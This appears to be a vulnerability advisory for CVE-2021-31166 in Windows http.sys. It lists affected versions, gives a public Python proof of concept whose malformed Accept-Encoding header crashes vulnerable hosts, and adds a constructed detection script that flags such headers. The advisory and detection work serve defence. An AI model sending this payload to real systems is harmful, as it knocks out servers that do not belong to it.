# HTTP Protocol Stack Remote Code Execution Vulnerability (CVE-2021-31166)

2021-05-21 09:14:38
    
    
The vulnerability lies in the request handling of the HTTP Protocol Stack (http.sys). An unauthenticated remote attacker can exploit it by sending specially crafted packets to the target host, achieving arbitrary code execution on the target system with kernel privileges. CVSS score: 9.8.
    
Affected versions

* Windows Server, version 20H2 (Server Core Installation)
* Windows 10 Version 20H2 for ARM64-based Systems
* Windows 10 Version 20H2 for 32-bit Systems
* Windows 10 Version 20H2 for x64-based Systems
* Windows Server, version 2004 (Server Core installation)
* Windows 10 Version 2004 for x64-based Systems
* Windows 10 Version 2004 for ARM64-based Systems
* Windows 10 Version 2004 for 32-bit Systems
    
PoC.py:

```python
import argparse
import requests


def main():
    parser = argparse.ArgumentParser(
        description='PoC for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required=True,
                        help='host[:port] running the HTTP.sys-based service')
    args = parser.parse_args()
    # A single GET carrying a malformed Accept-Encoding list (empty list
    # elements) is what triggers the bug in the HTTP.sys handler.
    r = requests.get(f'http://{args.target}/', headers={
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    # A vulnerable host typically never answers (it crashes); a patched
    # host returns a normal response object.
    print(r)


if __name__ == '__main__':
    main()
```
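As an added example (not part of the original page or the public PoC), the following Python check is one a defender could run over captured requests or web logs: it parses the Accept-Encoding header and counts empty list elements and non-token codings, which is the oddity visible in the PoC's header value. The request samples are constructed; the header name and structure follow RFC 7230, but the anomaly thresholds are an assumption.

```python
import re
from typing import Dict, List, Optional

# Constructed sample requests (not captured traffic). The second one carries
# the same malformed Accept-Encoding value as the PoC above.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: srv\r\nAccept-Encoding: gzip, deflate, br\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: srv\r\nAccept-Encoding: doar-e, ftw, imo, ,\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: srv\r\nAccept-Encoding: gzip,\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: srv\r\nUser-Agent: scanner\r\n\r\n",
]

# token = 1*tchar (RFC 7230 section 3.2.6); "*" is also a valid coding name.
TOKEN_RE = re.compile(r"[A-Za-z0-9!#$%&'*+.^_`|~-]+")


def header_value(raw: str, name: str) -> Optional[str]:
    """Return the first value of header `name` in a raw request, or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        field, sep, value = line.partition(":")
        if sep and field.strip().lower() == name.lower():
            return value.strip()
    return None


def accept_encoding_anomalies(value: str) -> Dict[str, int]:
    """Count empty list elements and codings that are not valid tokens."""
    elements = [e.strip() for e in value.split(",")]
    empty = sum(1 for e in elements if e == "")
    bad = 0
    for e in elements:
        if e == "":
            continue
        coding = e.split(";", 1)[0].strip()      # drop any ";q=" weight
        if not TOKEN_RE.fullmatch(coding):
            bad += 1
    return {"empty_elements": empty, "bad_codings": bad}


def scan(requests: List[str]) -> List[Dict[str, int]]:
    """Per request, report Accept-Encoding anomalies (zeros if absent)."""
    report = []
    for raw in requests:
        ae = header_value(raw, "Accept-Encoding")
        report.append(accept_encoding_anomalies(ae) if ae is not None
                      else {"empty_elements": 0, "bad_codings": 0})
    return report


if __name__ == "__main__":
    for raw, res in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        flag = "ALERT" if res["empty_elements"] else "ok"
        print(flag, res, repr(header_value(raw, "Accept-Encoding")))
```

RFC 7230 section 7 requires recipients to parse and ignore a reasonable number of empty list elements, so a single trailing comma is legal and this is an alerting heuristic, not a blocking rule; several empty elements in one value, as in the PoC, is the pattern worth raising.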
    
References:

* https://github.com/0vercl0k/CVE-2021-31166
* http://blog.nsfocus.net/cve-2021-31166/
* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166
    